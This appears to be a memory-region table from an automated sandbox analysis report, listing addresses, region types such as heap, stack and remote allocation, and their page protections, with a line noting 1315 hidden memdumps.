1FCDDD97000
|
trusted library allocation
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
3003000
|
heap
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
2EC0000
|
unkown
|
page readonly
|
||
|
4DA1000
|
trusted library allocation
|
page read and write
|
||
|
7089000
|
heap
|
page read and write
|
||
|
2323931A000
|
heap
|
page read and write
|
||
|
3484000
|
heap
|
page read and write
|
||
|
989000
|
heap
|
page read and write
|
||
|
1FCDD9DA000
|
trusted library allocation
|
page read and write
|
||
|
1FCDEF76000
|
trusted library allocation
|
page read and write
|
||
|
23236E6B000
|
heap
|
page read and write
|
||
|
23238BE9000
|
heap
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
4623000
|
heap
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
23236DA0000
|
heap
|
page read and write
|
||
|
81F3000
|
heap
|
page read and write
|
||
|
2CB2000
|
heap
|
page read and write
|
||
|
4A30000
|
heap
|
page read and write
|
||
|
2323931D000
|
heap
|
page read and write
|
||
|
232392FE000
|
heap
|
page read and write
|
||
|
1FCDD9FD000
|
trusted library allocation
|
page read and write
|
||
|
D11000
|
unkown
|
page execute read
|
||
|
45B0000
|
heap
|
page read and write
|
||
|
27D7000
|
heap
|
page read and write
|
||
|
1FCDDDF0000
|
trusted library allocation
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
1FCF58B4000
|
heap
|
page read and write
|
||
|
23238BE4000
|
heap
|
page read and write
|
||
|
23238785000
|
heap
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
23238CD1000
|
heap
|
page read and write
|
||
|
2323931D000
|
heap
|
page read and write
|
||
|
81EE000
|
heap
|
page read and write
|
||
|
23238C91000
|
heap
|
page read and write
|
||
|
8490000
|
trusted library allocation
|
page execute and read and write
|
||
|
19CFE6EA000
|
heap
|
page read and write
|
||
|
4623000
|
heap
|
page read and write
|
||
|
1FCDF367000
|
trusted library allocation
|
page read and write
|
||
|
349B000
|
remote allocation
|
page execute and read and write
|
||
|
1FCDB80D000
|
heap
|
page read and write
|
||
|
1DEEBA00000
|
system
|
page execute and read and write
|
||
|
323E000
|
stack
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
25CC000
|
unkown
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
2BFB000
|
heap
|
page read and write
|
||
|
4F3E000
|
stack
|
page read and write
|
||
|
85B000
|
heap
|
page read and write
|
||
|
5261000
|
direct allocation
|
page execute and read and write
|
||
|
31FE000
|
stack
|
page read and write
|
||
|
23238BA0000
|
heap
|
page read and write
|
||
|
4590000
|
direct allocation
|
page read and write
|
||
|
7080000
|
heap
|
page read and write
|
||
|
23238BE9000
|
heap
|
page read and write
|
||
|
7099000
|
heap
|
page read and write
|
||
|
1DEED618000
|
trusted library allocation
|
page read and write
|
||
|
232387B4000
|
heap
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
22F2000
|
unkown
|
page read and write
|
||
|
23238C55000
|
heap
|
page read and write
|
||
|
23B2000
|
unkown
|
page read and write
|
||
|
1FCDEFBA000
|
trusted library allocation
|
page read and write
|
||
|
1DEEBC5C000
|
heap
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
8256000
|
heap
|
page read and write
|
||
|
346C000
|
heap
|
page read and write
|
||
|
21B9000
|
system
|
page execute and read and write
|
||
|
23238C59000
|
heap
|
page read and write
|
||
|
1010000
|
unkown
|
page readonly
|
||
|
23238818000
|
heap
|
page read and write
|
||
|
DD2353E000
|
stack
|
page read and write
|
||
|
1FCDF3A7000
|
trusted library allocation
|
page read and write
|
||
|
23238C8D000
|
heap
|
page read and write
|
||
|
1FD70000
|
remote allocation
|
page read and write
|
||
|
31B0000
|
heap
|
page read and write
|
||
|
23238C6F000
|
heap
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
There are 1315 hidden memdumps, click here to show them.